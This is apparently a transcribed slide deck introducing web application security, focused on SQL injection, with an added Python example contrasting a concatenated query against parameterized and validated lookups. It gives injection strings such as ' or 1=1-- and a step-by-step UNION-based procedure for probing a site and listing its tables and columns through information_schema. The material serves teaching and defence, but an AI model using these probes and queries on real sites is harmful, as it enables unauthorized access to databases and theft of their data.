Web app security part 1

Web Application Security By Noah Franklin J

Upload: noahfranklin

Post on 05-Dec-2014

Page 1: Web app security part 1

Web Application Security

By Noah Franklin J

Page 2: Web app security part 1

Session Flow

Copy Rights to Noah Franklin J

• What is Web Application Security?

• Security Misconceptions

• Reasons for Attacking Web Applications

• OWASP Top 10 Vulnerabilities

• Security guidelines

• Web Application Security checklist

Page 3: Web app security part 1

Web Application Setup

Page 4: Web app security part 1

Web Application Setup

[Figure: web application setup diagram. Infrastructure layers from the outside in: Firewall, Hardened OS, Web Server, App Server, Firewall, Databases, Legacy Systems, Web Services, Directories, Human Resrcs, Billing, with Custom Code at the centre. The business functions the custom code exposes are Accounts, Finance, Administration, Transactions, Communication, Knowledge Mgmt, E-Commerce and Bus. Functions. An "APPLICATION ATTACK" arrow passes through the Network Layer into the Application Layer; an "Insider" is shown originating inside the perimeter.]

Application Layer

• Attacker sends attacks inside valid HTTP requests

• Your custom code is tricked into doing something it should not

• Security requires software development expertise, not signatures

Network Layer

• Firewall, hardening, patching, IDS, and SSL cannot detect or stop attacks inside HTTP requests.

• Security relies on signature databases

Page 5: Web app security part 1

Reasons for Attacking Web Apps

Page 6: Web app security part 1

Web Application Threats

Page 7: Web app security part 1

Web Application Threats

Page 8: Web app security part 1

Web Application Working

[Figure: how a SQL injection attack works. 1. Attacker enters SQL fragments into a web page that uses input in a query (attacker sends data containing SQL fragments). 2. Application sends modified query to database, which executes it. 3. Attacker views unauthorized data. The Custom Code sits between the business functions (Accounts, Finance, Administration, Transactions, Communication, Knowledge Mgmt, E-Commerce, Bus. Functions) and the Database.]

EXAMPLE: $sql = "SELECT * FROM table WHERE id = '" . $_REQUEST['id'] . "'";

Page 9: Web app security part 1

Injection Flaw

[Figure: the web application setup diagram again (Firewall, Hardened OS, Web Server, App Server, Firewall, Databases, Legacy Systems, Web Services, Directories, Human Resrcs, Billing, Custom Code, business functions), annotated with the flow HTTP request -> SQL query -> DB Table -> HTTP response. The injected query shown is "SELECT * FROM accounts WHERE acct='' OR 1=1--'" and the returned page is an Account Summary listing Acct: 5424-6066-2134-4334 followed by further Account / SKU rows.]

1. Application presents a form to the attacker, all via SSL

2. Attacker sends an attack in the form data

3. Application forwards the attack to the database in a SQL query

4. Database runs the query containing the attack and sends encrypted results back to the application

5. Application decrypts data as normal and sends results to the user

Page 10: Web app security part 1

What is SQL Injection?

Insertion of SQL statements into application inputs to corrupt, exploit, or otherwise damage an application database.

Most commonly done directly through web forms, but can be directed through URL hacking, request hacking using debugging tools, or using bots that emulate browsers and manipulate web requests.

Page 11: Web app security part 1

What is a SQL Injection Attack?

Many web applications take user input from a form

A SQL injection attack involves placing SQL statements in the user input

Page 12: Web app security part 1

SQL Basics

• Standard SQL commands such as "Select", "Insert", "Update", "Delete", "Create", and "Drop" can be used to accomplish almost everything that one needs to do with a database.

Page 13: Web app security part 1

Types of SQL injection

• Direct injection. Example: ' or 1=1-- and true conditions

• Indirect injection

  Integer based

  String based

  Error based

  Blind

  XML injection

  Double string

Page 14: Web app security part 1

Program Behind Login Page

/* Pseudocode for the login check: both submitted values must match the stored credentials */
if ((username == "franky") && (password == "12345"))
{
    printf("Welcome to Email ");
}
else
{
    printf("Invalid Username or password");
}

Page 15: Web app security part 1

Program Behind Login Page

/* Pseudocode: the attacker submits a' or 1=1-- in both fields, so once the values reach
   the SQL query each condition ends in "or 1=1", which is always true */
if ((username == "a' or 1=1--") && (password == "a' or 1=1--"))
{
    printf("Welcome to Email ");
}
else
{
    printf("Invalid Username or password");
}

Page 16: Web app security part 1

SQL Injection

SQL Basic Demo

Page 17: Web app security part 1

SQL Injection Extracting Database

Example: www.site.com/index.php?id=1

Add ' or /* after id=1 to check whether the site is vulnerable or not.

If the site gives an error or a blank page, then the site is vulnerable to SQL injection.

Page 18: Web app security part 1

SQL Injection Extracting Database

www.site.com/index.php?id=1+union+all+select+1,table_name,3,,5,6,7+from+information_schema.tables

The above mentioned query gives the names of the tables stored in the database.

www.site.com/index.php?id=1+union+all+select+1,column_name,3,4,5,6,7+from+information_schema.columns+where+table_schema=char()

The above mentioned query gives the names of the columns stored in the database.

Page 20: Web app security part 1

SQL Injection

SQL Demo

Page 21: Web app security part 1

Countermeasure

• Check the input provided to database queries

• Validate and sanitize every user variable passed to the database
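The concatenated query from the "Web Application Working" slide next to the two countermeasures above, as an added example that is not part of the original deck: the deck's snippet is PHP, and the same construction is reproduced here in Python against a constructed in-memory SQLite accounts table (the sample rows and the function names are assumptions) so that the effect of the deck's ' OR 1=1-- input, and of binding the value as a parameter instead, can be run offline.

```python
import sqlite3

# Constructed sample data standing in for the deck's "accounts" table (not real accounts).
SAMPLE_ROWS = [
    (1, "5424-6066-2134-4334", "franky"),
    (2, "4111-1111-1111-1111", "alice"),
]


def make_db():
    """Build an in-memory SQLite database holding the constructed accounts table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE accounts (id INTEGER PRIMARY KEY, acct TEXT, owner TEXT)")
    conn.executemany("INSERT INTO accounts VALUES (?, ?, ?)", SAMPLE_ROWS)
    return conn


def lookup_vulnerable(conn, user_id):
    """Same construction as the deck's $sql = "... WHERE id = '" . $_REQUEST['id'] . "'":
    the raw request value is pasted into the SQL text, so a quote in it ends the literal
    and whatever follows is parsed as SQL."""
    sql = "SELECT id, acct, owner FROM accounts WHERE id = '" + user_id + "'"
    return conn.execute(sql).fetchall()


def lookup_parameterized(conn, user_id):
    """Countermeasure: bind the value as a query parameter. The driver passes it as data,
    so the text ' OR 1=1-- is compared against id as a plain string and matches no row."""
    return conn.execute(
        "SELECT id, acct, owner FROM accounts WHERE id = ?", (user_id,)
    ).fetchall()


def lookup_validated(conn, user_id):
    """Defence in depth: check the input first (an account id is a short run of digits),
    then bind it. Anything else is rejected before a query is built at all."""
    if not (user_id.isdigit() and len(user_id) <= 10):
        raise ValueError("invalid account id")
    return lookup_parameterized(conn, int(user_id))


if __name__ == "__main__":
    db = make_db()
    payload = "' OR 1=1--"  # the deck's "true condition" injection
    print(lookup_vulnerable(db, "1"))  # one row, as the developer intended
    print(lookup_vulnerable(db, payload))  # every row: WHERE id = '' OR 1=1--'
    print(lookup_parameterized(db, payload))  # [] : the payload is just a string
    try:
        lookup_validated(db, payload)
    except ValueError as err:
        print("rejected:", err)
```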